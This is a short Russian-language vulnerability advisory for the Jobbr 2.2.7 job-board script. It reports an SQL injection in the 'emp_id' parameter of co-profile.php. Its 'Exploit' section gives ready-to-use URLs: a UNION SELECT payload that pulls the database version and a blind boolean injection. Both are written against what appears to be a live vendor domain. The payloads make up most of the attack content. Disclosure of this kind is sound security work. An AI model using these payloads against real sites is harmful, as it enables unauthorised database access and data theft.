Программа: Jobbr 2.2.7

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «emp_id» сценарием co-profile.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://www.site.com/co-profile.php?emp_id=[SQL]
http://www.jobbr.us/co-profile.php?emp_id=null+union+select+version(),2,3,4,5,6,7,8--

http://www.site.com/co-profile.php?emp_id=[BLIND]
http://www.jobbr.us/co-profile.php?emp_id=1+AND%20SUBSTRING(@@version,1,1)=5

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии